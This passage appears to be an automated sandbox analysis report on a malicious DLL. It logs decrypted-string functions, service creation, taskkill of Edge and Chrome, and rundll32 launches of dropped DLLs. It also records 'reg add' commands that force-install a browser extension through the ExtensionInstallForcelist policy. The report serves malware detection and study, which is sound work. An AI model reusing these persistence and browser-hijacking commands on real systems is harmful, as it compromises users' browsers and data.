Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85E6338 39_2_000001C9C85E6338
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85E6330 39_2_000001C9C85E6330
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85E6360 39_2_000001C9C85E6360
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85E6358 39_2_000001C9C85E6358
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85563E0 39_2_000001C9C85563E0
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C8548460 39_2_000001C9C8548460
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85C2514 39_2_000001C9C85C2514
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85CC5A0 39_2_000001C9C85CC5A0
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85BA610 39_2_000001C9C85BA610
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85C4698 39_2_000001C9C85C4698
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C8586660 39_2_000001C9C8586660
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85C8728 39_2_000001C9C85C8728
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85C07F4 39_2_000001C9C85C07F4
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C856A7D0 39_2_000001C9C856A7D0
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C857FA75 39_2_000001C9C857FA75
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85D9A6C 39_2_000001C9C85D9A6C
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85CDADC 39_2_000001C9C85CDADC
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85AFB50 39_2_000001C9C85AFB50
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C8539C28 39_2_000001C9C8539C28
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C8567C98 39_2_000001C9C8567C98
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C8537C40 39_2_000001C9C8537C40
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C8569D70 39_2_000001C9C8569D70
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85D5D90 39_2_000001C9C85D5D90
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85A1D40 39_2_000001C9C85A1D40
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85BDDD8 39_2_000001C9C85BDDD8
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C856DE70 39_2_000001C9C856DE70
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C8597FA0 39_2_000001C9C8597FA0
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C853FF90 39_2_000001C9C853FF90
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C8569F30 39_2_000001C9C8569F30
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85C9F5C 39_2_000001C9C85C9F5C
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C8565F50 39_2_000001C9C8565F50
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85E6088 39_2_000001C9C85E6088
Found potential string decryption / allocating functions
Source: C:\Windows\System32\rundll32.exe Code function: String function: 000001C9C85B4DBC appears 56 times
Source: C:\Windows\System32\rundll32.exe Code function: String function: 00000166D8F3F85C appears 39 times
Source: C:\Windows\System32\rundll32.exe Code function: String function: 000001C9C85802A0 appears 205 times
Source: C:\Windows\System32\rundll32.exe Code function: String function: 000001C9C856B0A0 appears 46 times
Source: C:\Windows\System32\rundll32.exe Code function: String function: 00000166D8F55AF8 appears 54 times
Source: C:\Windows\System32\rundll32.exe Code function: String function: 000001C9C8585B60 appears 51 times
Source: C:\Windows\System32\rundll32.exe Code function: String function: 000001C9C856DBB0 appears 51 times
Source: C:\Windows\System32\rundll32.exe Code function: String function: 000001C9C85B2F8C appears 61 times
Source: C:\Windows\System32\rundll32.exe Code function: String function: 000001C9C856DD30 appears 34 times
Source: C:\Windows\System32\rundll32.exe Code function: String function: 0000021BD978F85C appears 39 times
Source: C:\Windows\System32\rundll32.exe Code function: String function: 000001C9C8580130 appears 293 times
Source: C:\Windows\System32\rundll32.exe Code function: String function: 0000021BD97A5AF8 appears 54 times
Source: C:\Windows\System32\rundll32.exe Code function: String function: 000001C9C85B8760 appears 47 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 046B4DC0 appears 37 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 045F4DC0 appears 37 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 03464DC0 appears 37 times
Uses 32bit PE files
Source: anuwhqTXGt.dll Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Uses reg.exe to modify the Windows registry
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\reg.exe reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Edge\ExtensionInstallForcelist /v 1 /t REG_SZ /d liffkepbndfkkknedglekeghaegocokk;file:///C:/Windows/Installer/{f4b964cf-1b7a-aa88-03cb-3533f33b6987}/c23a32abd836342a70b7f6c1aa74947e.2.E /reg:32
Source: classification engine Classification label: mal84.phis.evad.winDLL@83/48@7/4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046A1130 SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,lstrcpynW,lstrcpynW,GetCommandLineW,lstrcpynW,GetModuleHandleW,CharNextW,lstrcpynW,GetTempPathW,GetTempPathW,lstrcatW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcpynW,lstrcpynW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,lstrcpynW,lstrcpynW,DeleteFileW,CopyFileW,CloseHandle,lstrcatW,lstrlenW,lstrcmpiW,GetFileAttributesW,lstrcpynW,LoadImageW,RegisterClassW,SystemParametersInfoW,CreateWindowExW,CloseHandle,FreeLibrary,GlobalFree,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx, 6_2_046A1130
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_045E1130 SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,lstrcpynW,lstrcpynW,GetCommandLineW,lstrcpynW,GetModuleHandleW,CharNextW,lstrcpynW,GetTempPathW,GetTempPathW,lstrcatW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcpynW,lstrcpynW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,lstrcpynW,lstrcpynW,DeleteFileW,CopyFileW,CloseHandle,lstrcatW,lstrlenW,lstrcmpiW,GetFileAttributesW,lstrcpynW,LoadImageW,RegisterClassW,SystemParametersInfoW,CreateWindowExW,CloseHandle,FreeLibrary,GlobalFree,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx, 7_2_045E1130
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_03451130 SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,lstrcpynW,lstrcpynW,GetCommandLineW,lstrcpynW,GetModuleHandleW,CharNextW,lstrcpynW,GetTempPathW,GetTempPathW,lstrcatW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcpynW,lstrcpynW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,lstrcpynW,lstrcpynW,DeleteFileW,CopyFileW,CloseHandle,lstrcatW,lstrlenW,lstrcmpiW,GetFileAttributesW,lstrcpynW,LoadImageW,RegisterClassW,SystemParametersInfoW,CreateWindowExW,CloseHandle,FreeLibrary,GlobalFree,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx, 15_2_03451130
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD978B040 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle, 33_2_0000021BD978B040
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F3B040 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle, 34_2_00000166D8F3B040
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C8532F4C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,WTSEnumerateSessionsW,WTSFreeMemory,WTSQueryUserToken,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,DuplicateTokenEx,CloseHandle,CloseHandle,CreateEnvironmentBlock,CreateProcessAsUserW,CloseHandle,CloseHandle,DestroyEnvironmentBlock,DestroyEnvironmentBlock,CloseHandle,CloseHandle,CloseHandle, 39_2_000001C9C8532F4C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046A5887 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,lstrcpynW,lstrcpynW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,EnableWindow, 6_2_046A5887
Source: C:\Windows\System32\rundll32.exe Code function: PathFileExistsW,OpenSCManagerW,CreateServiceW,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 33_2_0000021BD9772DD0
Source: C:\Windows\System32\rundll32.exe Code function: PathFileExistsW,OpenSCManagerW,CreateServiceW,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 34_2_00000166D8F22DD0
Source: C:\Windows\System32\rundll32.exe Code function: PathFileExistsW,OpenSCManagerW,CreateServiceW,GetLastError,CloseServiceHandle,ChangeServiceConfig2W,CloseServiceHandle,CloseServiceHandle, 39_2_000001C9C85318D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046A4392 CoCreateInstance, 6_2_046A4392
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_6D4BB105 LoadResource,LockResource,SizeofResource, 6_2_6D4BB105
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD9773160 OpenSCManagerA,OpenServiceW,QueryServiceStatusEx,StartServiceA,CloseServiceHandle,CloseServiceHandle, 33_2_0000021BD9773160
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD978D9D0 StartServiceCtrlDispatcherW, 33_2_0000021BD978D9D0
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F3D9D0 StartServiceCtrlDispatcherW, 34_2_00000166D8F3D9D0
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C8551D48 GetCommandLineW,CommandLineToArgvW,OpenEventW,CloseHandle,StartServiceCtrlDispatcherW, 39_2_000001C9C8551D48
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Program Files (x86)\Wimsys Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\Public\wss_tmp Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7576:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7492:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7820:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7704:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6540:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7768:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7872:120:WilError_03
Source: C:\Windows\System32\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\A6A161D8-150E-46A1-B7EC-18E4CB58C6D2
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7632:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8052:120:WilError_03
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user~1\AppData\Local\Temp\nsvEFD9.tmp Jump to behavior
Source: anuwhqTXGt.dll Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "msedge.exe")
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "msedge.exe")
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe")
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe")
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "msedge.exe")
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe")
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\anuwhqTXGt.dll",#1
Source: taskkill.exe, 00000011.00000002.1386001358.0000000003268000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "msedge.exe")m ;;dZ
Source: anuwhqTXGt.dll Virustotal: Detection: 11%
Source: rundll32.exe String found in binary or memory: --install-run
Source: rundll32.exe String found in binary or memory: --install
Source: rundll32.exe String found in binary or memory: --install-run
Source: rundll32.exe String found in binary or memory: --install
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\anuwhqTXGt.dll"
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\anuwhqTXGt.dll",#1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\anuwhqTXGt.dll",#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\anuwhqTXGt.dll,get
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalService -s W32Time
Source: unknown Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\anuwhqTXGt.dll",get
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /IM msedge.exe
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /IM msedge.exe
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /IM chrome.exe
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /IM chrome.exe
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\reg.exe reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Edge\ExtensionInstallForcelist /v 1 /t REG_SZ /d liffkepbndfkkknedglekeghaegocokk;file:///C:/Windows/Installer/{f4b964cf-1b7a-aa88-03cb-3533f33b6987}/c23a32abd836342a70b7f6c1aa74947e.2.E /reg:32
Source: C:\Windows\SysWOW64\reg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\reg.exe reg add HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\ExtensionInstallForcelist /v 1 /t REG_SZ /d liffkepbndfkkknedglekeghaegocokk;file:///C:/Windows/Installer/{f4b964cf-1b7a-aa88-03cb-3533f33b6987}/c23a32abd836342a70b7f6c1aa74947e.2 /reg:32
Source: C:\Windows\SysWOW64\reg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /IM msedge.exe
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 "C:\Users\Public\wss_tmp\cr_ws_2.dll" main --install-run
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 "C:\Users\Public\wss_tmp\cr_ws_2.dll" main --install-run
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe rundll32 "C:\Users\Public\wss_tmp\cr_ws_2.dll" main --install-run
Source: unknown Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\Public\wss_tmp\cr_ws_2.dll" main
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /IM chrome.exe
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 "C:\Users\Public\fbe\fbegbhf.dll" main -c uninstall
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe rundll32 "C:\Users\Public\fbe\fbegbhf.dll" main -c uninstall
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\rundll32.exe "rundll32.exe" "C:\Users\Public\wss_tmp\cr_ws_2.dll" main JkoI28tA7 s54VVA9PL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 "C:\Users\Public\wss_tmp\cr_ws_2.dll" main --install-run
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe rundll32 "C:\Users\Public\wss_tmp\cr_ws_2.dll" main --install-run
Source: unknown Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\Public\wss_tmp\cr_ws_2.dll" main
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 "C:\Users\Public\fbe\fbegbhf.dll" main -c install-run
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe rundll32 "C:\Users\Public\fbe\fbegbhf.dll" main -c install-run
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 "C:\Users\Public\fbe\fbegbhf.dll" main -c uninstall
Source: unknown Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\Public\fbe\fbegbhf.dll" main
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe rundll32 "C:\Users\Public\fbe\fbegbhf.dll" main -c uninstall
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\rundll32.exe "rundll32.exe" "C:\Users\Public\wss_tmp\cr_ws_2.dll" main 5l2dLaWBz 8H16fjAVL
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\anuwhqTXGt.dll",#1 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\anuwhqTXGt.dll,get Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\anuwhqTXGt.dll",get Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\anuwhqTXGt.dll",#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /IM msedge.exe Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /IM chrome.exe Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\reg.exe reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Edge\ExtensionInstallForcelist /v 1 /t REG_SZ /d liffkepbndfkkknedglekeghaegocokk;file:///C:/Windows/Installer/{f4b964cf-1b7a-aa88-03cb-3533f33b6987}/c23a32abd836342a70b7f6c1aa74947e.2.E /reg:32 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\reg.exe reg add HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\ExtensionInstallForcelist /v 1 /t REG_SZ /d liffkepbndfkkknedglekeghaegocokk;file:///C:/Windows/Installer/{f4b964cf-1b7a-aa88-03cb-3533f33b6987}/c23a32abd836342a70b7f6c1aa74947e.2 /reg:32 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 "C:\Users\Public\wss_tmp\cr_ws_2.dll" main --install-run Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /IM msedge.exe Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /IM chrome.exe Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 "C:\Users\Public\wss_tmp\cr_ws_2.dll" main --install-run Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 "C:\Users\Public\fbe\fbegbhf.dll" main -c uninstall Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 "C:\Users\Public\fbe\fbegbhf.dll" main -c install-run Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /IM msedge.exe Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /IM chrome.exe Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 "C:\Users\Public\wss_tmp\cr_ws_2.dll" main --install-run Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 "C:\Users\Public\fbe\fbegbhf.dll" main -c uninstall Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe rundll32 "C:\Users\Public\wss_tmp\cr_ws_2.dll" main --install-run
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\rundll32.exe "rundll32.exe" "C:\Users\Public\wss_tmp\cr_ws_2.dll" main JkoI28tA7 s54VVA9PL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe rundll32 "C:\Users\Public\fbe\fbegbhf.dll" main -c uninstall
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe rundll32 "C:\Users\Public\wss_tmp\cr_ws_2.dll" main --install-run
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\rundll32.exe "rundll32.exe" "C:\Users\Public\wss_tmp\cr_ws_2.dll" main 5l2dLaWBz 8H16fjAVL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe rundll32 "C:\Users\Public\fbe\fbegbhf.dll" main -c install-run
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe rundll32 "C:\Users\Public\fbe\fbegbhf.dll" main -c uninstall
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: moshost.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mapsbtsvc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mosstorage.dll Jump to behavior
